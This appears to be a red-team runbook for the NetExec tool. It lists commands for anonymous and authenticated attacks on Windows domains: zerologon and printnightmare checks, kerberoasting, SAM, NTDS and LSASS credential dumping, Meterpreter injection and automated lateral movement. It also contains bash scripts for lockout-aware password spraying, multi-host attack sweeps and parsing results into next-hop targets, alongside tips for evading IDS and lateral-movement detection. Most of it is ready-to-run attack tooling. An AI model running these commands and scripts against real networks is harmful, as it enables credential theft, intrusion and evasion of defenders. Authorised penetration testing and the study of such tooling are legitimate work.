Created November 8, 2024 17:11
NetExec Runbook
# NetExec Runbook
## No Authentication (Anonymous)
### NFS Enumeration
```bash
netexec nfs TARGET_HOST -u "" -p "" --shares
netexec nfs TARGET_HOST -u "" -p "" --enum-shares
```
### SMB Exploit Checks
```bash
netexec smb TARGET_HOST -u '' -p '' -M zerologon
netexec smb TARGET_HOST -u '' -p '' -M petitpotam
```
## Low Privilege (Standard User)
### SMB Enumeration & Exploit Checks
```bash
netexec smb TARGET_HOST -u USER -p PASS --shares
netexec smb TARGET_HOST -u USER -p PASS --sessions
netexec smb TARGET_HOST -u USER -p PASS --rid-brute
netexec smb TARGET_HOST -u USER -p PASS -M enum_av
netexec smb TARGET_HOST -u USER -p PASS -M printerbug
netexec smb TARGET_HOST -u USER -p PASS -M printnightmare
netexec smb TARGET_HOST -u USER -p PASS -M ioxidresolver
netexec smb TARGET_HOST -u USER -p PASS -M ms17-010
```
### LDAP Enumeration & Attacks
```bash
netexec ldap TARGET_HOST -u USER -p PASS --users
netexec ldap TARGET_HOST -u USER -p PASS --groups
netexec ldap TARGET_HOST -u USER -p PASS --asreproast /tmp/hashes.txt
netexec ldap TARGET_HOST -u USER -p PASS --kerberoasting /tmp/hashes.txt
netexec ldap TARGET_HOST -u USER -p PASS -M adcs
netexec ldap TARGET_HOST -u USER -p PASS -M laps
```
### WMI Exploits
Modules are loaded per protocol, so check what the `wmi` protocol actually offers with `netexec wmi -L` before relying on anything here; `zerologon` and `ioxidresolver` are written for `smb`, and if `wmi -L` does not list them, run them through `smb` as in the sections above.
```bash
netexec wmi TARGET_HOST -u USER -p PASS -M ioxidresolver
netexec wmi TARGET_HOST -u USER -p PASS -M zerologon
```
### MSSQL Privesc Checks
```bash
netexec mssql TARGET_HOST -u USER -p PASS -M mssql_priv
```
## High Privilege (Administrative)
### SMB Credential Dumping & Lateral Movement
```bash
netexec smb TARGET_HOST -u ADMIN -p PASS --sam
netexec smb TARGET_HOST -u ADMIN -p PASS --lsa
netexec smb TARGET_HOST -u ADMIN -p PASS --ntds
netexec smb TARGET_HOST -u ADMIN -p PASS -M hash_spider
netexec smb TARGET_HOST -u ADMIN -p PASS -M lsassy
```
### SMB Command & PowerShell Execution
```bash
netexec smb TARGET_HOST -u ADMIN -p PASS -x whoami
netexec smb TARGET_HOST -u ADMIN -p PASS -X Get-Process
```
### WinRM Credential Dumping & Execution
```bash
netexec winrm TARGET_HOST -u ADMIN -p PASS -X whoami
netexec winrm TARGET_HOST -u ADMIN -p PASS --sam
```
### WMI Enumeration
```bash
netexec wmi TARGET_HOST -u ADMIN -p PASS -M enum_dns
netexec wmi TARGET_HOST -u ADMIN -p PASS -M get_netconnections
```
### MSSQL Injection & Execution
```bash
netexec mssql TARGET_HOST -u ADMIN -p PASS -X whoami
netexec mssql TARGET_HOST -u ADMIN -p PASS -M met_inject
netexec mssql TARGET_HOST -u ADMIN -p PASS -M nanodump
```
# NetExec Tips & Best Practices
## Avoiding Detection
- Use the `--jitter` option to add randomized delays between requests to avoid triggering IPS/IDS
```
netexec --jitter 1-5 smb TARGET -u USER -p PASS
```
- Avoid using the same account to scan a large number of hosts; one account authenticating to every host in a subnet within a few seconds is exactly the pattern lateral-movement detections look for. Spread the work across accounts and over time.
## Targeted Enumeration
- Use `--filter-shares READ WRITE` to list only the shares the account can actually read or write, instead of wading through ACCESS_DENIED entries
- Grep and filter LDAP output to find specific users/groups of interest (`--users` prints the description column too, so `grep -i pass` is worth a look as well)
```
netexec ldap TARGET -u USER -p PASS --users | grep -i admin
```
- `--continue-on-success` does the opposite of stopping: by default NetExec halts once it finds a valid credential, and this flag makes it keep going through the rest of the list so every account sharing that password is reported. When both `-u` and `-p` are files of equal length, add `--no-bruteforce` to pair line N with line N instead of trying every combination.
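Spraying in rounds is where `--continue-on-success` earns its keep, and where a lockout policy bites. The wrapper below is an added example, not part of the original gist: it tries one password per round against a user list, lets NetExec keep reporting hits past the first one, and sleeps out the observation window between rounds. It assumes `nxc` is on PATH (`NXC=echo` dry-runs it) and that you have already read the policy with `netexec smb TARGET -u USER -p PASS --pass-pol`; the user and password files and the 1800-second window are placeholders for your own.

```bash
#!/usr/bin/env bash
# Lockout-aware password spray driver for NetExec.
# Added example, not part of the original runbook. Assumes nxc is on PATH
# (set NXC=echo to dry-run) and that the domain's lockout threshold and
# observation window are known (netexec smb TARGET ... --pass-pol).
set -eu

NXC="${NXC:-nxc}"
SLEEP="${SLEEP:-sleep}"    # set SLEEP=: to skip the waits when testing

# spray_round TARGET USERS_FILE PASSWORD
# One password against every user in the file. --continue-on-success keeps
# nxc going after the first hit so every account using that password is
# reported (the default stops at the first valid credential).
spray_round() {
    local target="$1" users="$2" password="$3"
    "$NXC" --jitter 5 smb "$target" -u "$users" -p "$password" --continue-on-success
}

# spray TARGET USERS_FILE PASSWORDS_FILE WINDOW_SECONDS
# One round per password, waiting WINDOW_SECONDS between rounds so each
# account accrues at most one bad-password count per observation window and
# never reaches the lockout threshold. Prints the number of rounds run.
spray() {
    local target="$1" users="$2" passwords="$3" window="$4"
    local rounds=0 password
    while IFS= read -r password || [ -n "$password" ]; do
        [ -n "$password" ] || continue            # skip blank lines
        [ "$rounds" -eq 0 ] || "$SLEEP" "$window" # wait out the window between rounds
        spray_round "$target" "$users" "$password"
        rounds=$((rounds + 1))
    done < "$passwords"
    echo "$rounds"
}
```

After sourcing the file, `spray dc01.corp.local users.txt passwords.txt 1800` runs the spray. A policy of, say, 5 bad attempts within a 30-minute window makes one password per 30 minutes the safe rate; anything faster burns accounts, and a `STATUS_ACCOUNT_LOCKED_OUT` in the output means stop immediately.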
## Automating with Scripts
- `-M` takes a module name, not a path. To run a custom module, drop the `.py` file into `~/.nxc/modules/` and call it by the `name` its module class defines; `netexec smb -L` shows everything that was loaded for a protocol
```
netexec smb TARGET -u ADMIN -p PASS -M custom_module
```
- Chain multiple NetExec commands together in a bash script to automate common enumeration tasks
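As a worked version of the chaining tip, here is an added example (not the gist's own code) that drives the runbook's phases over a host list and writes one log per host, so each phase's output can be reviewed or grepped later. It assumes `nxc` on PATH (`NXC=echo` for a dry run), a hosts file with one target per line, and an `OUTDIR` of your choosing; the phase contents mirror the sections above.

```bash
#!/usr/bin/env bash
# Drive the runbook's phases over a target list, one log per host.
# Added example, not part of the original gist. Assumes nxc on PATH (set
# NXC=echo for a dry run) and writes under OUTDIR (default ./nxc-out).
set -eu

NXC="${NXC:-nxc}"
OUTDIR="${OUTDIR:-./nxc-out}"

# run_cmd LOGFILE ARGS...  -- one nxc invocation, stdout and stderr appended to the log
run_cmd() {
    local log="$1"; shift
    printf '### %s\n' "$*" >> "$log"
    "$NXC" "$@" >> "$log" 2>&1 || true   # a failed check must not abort the sweep
}

# run_phase PHASE TARGET [USER PASS]  -- phases map to the runbook's sections; prints the log path
run_phase() {
    local phase="$1" target="$2" user="${3:-}" pass="${4:-}"
    local log="$OUTDIR/$phase/$target.log"
    mkdir -p "$OUTDIR/$phase"
    : > "$log"
    case "$phase" in
        anon)
            run_cmd "$log" nfs "$target" --shares
            run_cmd "$log" smb "$target" -u '' -p '' -M zerologon
            run_cmd "$log" smb "$target" -u '' -p '' -M petitpotam
            ;;
        low)
            for opt in --shares --sessions --rid-brute; do
                run_cmd "$log" smb "$target" -u "$user" -p "$pass" "$opt"
            done
            for mod in enum_av printnightmare ms17-010; do
                run_cmd "$log" smb "$target" -u "$user" -p "$pass" -M "$mod"
            done
            run_cmd "$log" ldap "$target" -u "$user" -p "$pass" \
                --kerberoasting "$OUTDIR/low/$target.kerberoast"
            ;;
        high)
            run_cmd "$log" smb "$target" -u "$user" -p "$pass" --sam
            run_cmd "$log" smb "$target" -u "$user" -p "$pass" --lsa
            run_cmd "$log" smb "$target" -u "$user" -p "$pass" -x whoami
            ;;
        *) echo "unknown phase: $phase" >&2; return 1 ;;
    esac
    echo "$log"
}

# run_all PHASE HOSTS_FILE [USER PASS]  -- one log per host; prints the number of hosts processed
run_all() {
    local phase="$1" hosts="$2" user="${3:-}" pass="${4:-}" n=0 host
    while IFS= read -r host || [ -n "$host" ]; do
        case "$host" in ''|'#'*) continue ;; esac   # skip blanks and comments
        run_phase "$phase" "$host" "$user" "$pass" > /dev/null
        n=$((n + 1))
    done < "$hosts"
    echo "$n"
}
```

Typical use is `run_all anon hosts.txt`, then `run_all low hosts.txt alice 'P@ss'`, and `run_all high admins.txt ADMIN PASS` only against hosts the low phase showed as `(Pwn3d!)`. Each `###` line in a log records the exact arguments that produced the output that follows, which is what you want when writing up which check ran where.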
## OPSEC Considerations
- Use `--dns-server` to resolve target hostnames through a DNS server of your choosing (typically a domain controller rather than whatever your attack box is configured with); `--dns-tcp` forces TCP and `--dns-timeout` adjusts how long to wait
```
netexec smb TARGET -u USER -p PASS --dns-server xx.xx.xx.xx
```
- Be careful when using modules that create/modify files on the target (scuffy, drop-sc, etc.) as they may get flagged by AV/EDR
- Clean up any files uploaded or created during your testing
## Offline Credential Attacks
- Use `--asreproast` and `--kerberoasting` to dump hashes for offline cracking; the output files are already in hashcat format (`-m 18200` for AS-REP, `-m 13100` for the usual RC4 `$krb5tgs$23$` tickets)
- Dump SAM/NTDS databases with `--sam` and `--ntds` and crack the NT hashes offline with hashcat `-m 1000`. `--ntds` pulls every domain hash over DRSUAPI replication from a DC, which is loud and only needs doing once.
## Lateral Movement
- Use the `hash_spider` module to spread automatically: it dumps LSASS with lsassy, takes every credential it recovers, picks the hosts where those accounts are local admin (it relies on BloodHound data in neo4j for this), and repeats from each newly owned box until nothing new turns up
- `-M lsassy` and `-M nanodump` dump LSASS remotely, but not quietly: both run a dumper on the target (lsassy through its dump methods, nanodump by uploading and executing its binary), so expect EDR to see the LSASS handle being opened. Parse the dumps offline rather than running mimikatz on the host.
- Use SMB `-M empire_exec` to launch an Empire stager, or `-M met_inject` (SMB or MSSQL) to inject Meterpreter, to turn admin access on a host into a C2 foothold for the next hop
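Moving laterally means turning the last sweep's output into the next sweep's input. The script below is an added example, not part of the original runbook: it parses a constructed sample of NetExec's output layout (protocol, IP, port, hostname, then the message) to pull out admin'd hosts, working credentials, writable non-default shares and lockout events. The sample log is invented for the example; the column order and the `[+]`, `(Pwn3d!)` and `STATUS_*` markers are NetExec's own.

```bash
#!/usr/bin/env bash
# Turn a NetExec sweep log into the inputs for the next hop.
# Added example, not part of the original runbook. The log below is a
# constructed sample in nxc's output layout (protocol, ip, port, hostname,
# message), not real engagement data.
set -eu

sample_output() {
    cat <<'EOF'
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [+] corp.local\alice:Winter2024!
SMB         10.10.10.6      445    WS01             [+] corp.local\alice:Winter2024! (Pwn3d!)
SMB         10.10.10.7      445    WS02             [-] corp.local\bob:Winter2024! STATUS_LOGON_FAILURE
SMB         10.10.10.7      445    WS02             [-] corp.local\carol:Winter2024! STATUS_ACCOUNT_LOCKED_OUT
SMB         10.10.10.8      445    FS01             [+] corp.local\alice:Winter2024! (Pwn3d!)
SMB         10.10.10.8      445    FS01             [*] Enumerated shares
SMB         10.10.10.8      445    FS01             Share           Permissions     Remark
SMB         10.10.10.8      445    FS01             -----           -----------     ------
SMB         10.10.10.8      445    FS01             ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.8      445    FS01             C$              READ,WRITE      Default share
SMB         10.10.10.8      445    FS01             IPC$            READ            Remote IPC
SMB         10.10.10.8      445    FS01             Finance         READ,WRITE
SMB         10.10.10.8      445    FS01             Public          READ
EOF
}

# Hosts where the credential is local admin: nxc tags those logins "(Pwn3d!)".
# The result can go straight back in as a target file for the high-privilege steps.
pwned_hosts() {
    awk '/\(Pwn3d!\)/ { print $2 }' | sort -u
}

# Every credential that authenticated, admin or not (field 6 of a "[+]" line).
valid_creds() {
    awk '$5 == "[+]" { print $6 }' | sort -u
}

# Non-default shares we can write to: candidates for dropping payloads or
# finding config files, printed as HOST\SHARE. Skips status lines ("[+]" etc.),
# the table header, and the administrative $ shares.
writable_shares() {
    awk '$5 !~ /^\[/ && $5 != "Share" && $5 !~ /\$$/ && $6 ~ /WRITE/ { print $4 "\\" $5 }'
}

# Number of lockouts seen; anything above 0 means stop spraying now.
lockouts() {
    awk '/STATUS_ACCOUNT_LOCKED_OUT/ { n++ } END { print n + 0 }'
}
```

The loop is `sample_output | pwned_hosts > next_targets.txt` (with the real log in place of the sample) followed by `netexec smb next_targets.txt -u alice -p 'Winter2024!' --sam`. Check `lockouts` first: if it returns anything other than 0, stop and find out why before touching another account.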
## Privilege Escalation
- Always check for low-hanging fruit like `gpp_password`, `gpp_autologin`, and unattended installs
- Abuse misconfigured service accounts and delegations with `--delegate` and `-M addcomputer`
- Use `-M masky` if an ADCS CA is reachable: it runs an agent on the target that requests a certificate for each logged-on user, then uses PKINIT to turn those certificates into NT hashes, so every interactive session on a host you administer becomes a domain credential
Hopefully these tips will help you get the most out of NetExec for your red team engagements and penetration tests! Let me know if you have any other NetExec tips to share.